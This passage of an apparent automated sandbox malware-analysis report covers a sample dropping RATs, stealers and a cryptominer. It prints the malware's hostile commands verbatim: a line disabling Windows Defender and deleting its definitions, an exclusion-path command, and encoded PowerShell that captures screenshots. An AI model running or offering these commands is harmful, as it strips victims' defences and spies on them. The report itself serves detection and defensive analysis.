lAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
                    • csc.exe (PID: 7912 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                      • cvtres.exe (PID: 6896 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5528.tmp" "c:\Users\user\AppData\Local\Temp\r1ffbxq0\CSCD4520F5E8E664C3288A2F8DB92B7943B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
                • cmd.exe (PID: 7780 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tree.com (PID: 6496 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
                • cmd.exe (PID: 8160 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tree.com (PID: 7528 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
                • cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • SIHClient.exe (PID: 7396 cmdline: C:\Windows\System32\sihclient.exe /cv qGOEROT6yEajSrP7aJ1lsw.0.2 MD5: 8BE47315BF30475EEECE8E39599E9273)
    • RuntimeBroker2.0.exe (PID: 7176 cmdline: "C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe" MD5: 95AF6E5D52A57515DC2E638C419F50D9)
      • WerFault.exe (PID: 7372 cmdline: C:\Windows\system32\WerFault.exe -u -p 7176 -s 2308 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7320 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7352 cmdline: C:\Windows\system32\WerFault.exe -pss -s 460 -p 7176 -ip 7176 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • powershell.exe (PID: 7488 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cscript.exe (PID: 1344 cmdline: C:\Users\user\cscript.exe MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)
  • cscript.exe (PID: 5596 cmdline: C:\Users\user\cscript.exe MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeJoeSecurity_DiscordRatYara detected Discord RatJoe Security
      C:\Users\user\AppData\Local\Temp\_MEI77042\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              Click to see the 11 entries
              SourceRuleDescriptionAuthorStrings
              0000002A.00000000.1886461269.0000000000302000.00000002.00000001.01000000.00000029.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000010.00000003.1795412848.0000014703693000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                  00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DiscordRatYara detected Discord RatJoe Security
                    00000015.00000003.1830651243.0000000007241000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_DiscordRatYara detected Discord RatJoe Security
                        Click to see the 7 entries
                        SourceRuleDescriptionAuthorStrings
                        0.2.87Bym0x4Fy.exe.3a24170.3.unpackJoeSecurity_DiscordRatYara detected Discord RatJoe Security
                          0.2.87Bym0x4Fy.exe.3a37e08.1.raw.unpackJoeSecurity_DiscordRatYara detected Discord RatJoe Security
                            0.2.87Bym0x4Fy.exe.3a10508.2.unpackJoeSecurity_DiscordRatYara detected Discord RatJoe Security
                              0.2.87Bym0x4Fy.exe.3a37e08.1.unpackJoeSecurity_DiscordRatYara detected Discord RatJoe Security
                                29.3.svchost.exe.564e6ea.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                  Click to see the 14 entries

                                  System Summary

                                  barindex
                                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\87Bym0x4Fy.exe, ProcessId: 6912, TargetFilename: C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87Bym0x4Fy.exe", ParentImage: C:\Users\user\Desktop\87Bym0x4Fy.exe, ParentProcessId: 6912, ParentProcessName: 87Bym0x4Fy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA=", ProcessId: 6232, ProcessName: powershell.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7748, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7932, ProcessName: cmd.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 8052, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7624, ProcessName: wscript.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 8052, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7624, ProcessName: wscript.exe
                                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 7748, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\RuntimeBroker.exe" , CommandLine: "C:\Users\user\AppData\Roaming\RuntimeBroker.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\RuntimeBroker.exe, NewProcessName: C:\Users\user\AppData\Roaming\RuntimeBroker.exe, OriginalFileName: C:\Users\user\AppData\Roaming\RuntimeBroker.exe, ParentCommandLine: "C:\Users\user\Desktop\87Bym0x4Fy.exe", ParentImage: C:\Users\user\Desktop\87Bym0x4Fy.exe, ParentProcessId: 6912, ParentProcessName: 87Bym0x4Fy.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\RuntimeBroker.exe" , ProcessId: 6864, ProcessName: RuntimeBroker.exe
                                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 8052, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7624, ProcessName: wscript.exe
                                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\RuntimeBroker.exe, ProcessId: 6864, TargetFilename: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe
                                  Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 